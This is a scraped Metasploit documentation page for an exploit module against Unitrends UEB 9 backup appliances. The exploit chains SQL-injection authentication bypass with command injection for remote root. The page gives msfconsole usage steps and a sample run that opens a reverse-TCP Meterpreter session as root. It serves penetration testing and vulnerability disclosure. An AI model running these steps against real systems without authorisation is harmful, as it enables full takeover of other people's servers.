metasploit-gs/documentation/modules/exploit/linux/http/ueb9_api_storage.md at a67122aaf7ebfe057481ca56bf9a2941a2fb7381

adam/metasploit-gs

Fork 0

Files

T

caleBot 36610b185b initial commit for UEB9 exploits - CVE-2017-12477, CVE-2017-12478

2017-10-06 09:38:33 -06:00

1.4 KiB

Raw Blame History

Vulnerable Application

Unitrends UEB 9 http api/storage remote root

This exploit leverages a sqli vulnerability for authentication bypass, together with command injection for subsequent root RCE.

Verification Steps

use exploit/linux/http/ueb9_api_storage
set lhost [IP]
set rhost [IP]
exploit
A meterpreter session should have been opened successfully

Scenarios

UEB 9.1 on CentOS 6.5

msf > use exploit/linux/http/ueb9_api_storage
msf exploit(ueb9_api_storage) > set rhost 10.0.0.230
rhost => 10.0.0.230
msf exploit(ueb9_api_storage) > set lhost 10.0.0.141
lhost => 10.0.0.141
msf exploit(ueb9_api_storage) > exploit

[*] Started reverse TCP handler on 10.0.0.141:4444
[*] 10.0.0.230:443 - pwn'ng ueb 9....
[*] Command Stager progress -  19.83% done (164/827 bytes)
[*] Command Stager progress -  39.30% done (325/827 bytes)
[*] Command Stager progress -  57.44% done (475/827 bytes)
[*] Command Stager progress -  75.45% done (624/827 bytes)
[*] Command Stager progress -  93.35% done (772/827 bytes)
[*] Command Stager progress - 110.88% done (917/827 bytes)
[*] Sending stage (826872 bytes) to 10.0.0.230
[*] Command Stager progress - 126.72% done (1048/827 bytes)
[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33674) at 2017-10-06 11:07:47 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

1.4 KiB Raw Blame History

Vulnerable Application

Verification Steps

Scenarios

UEB 9.1 on CentOS 6.5

1.4 KiB

Raw Blame History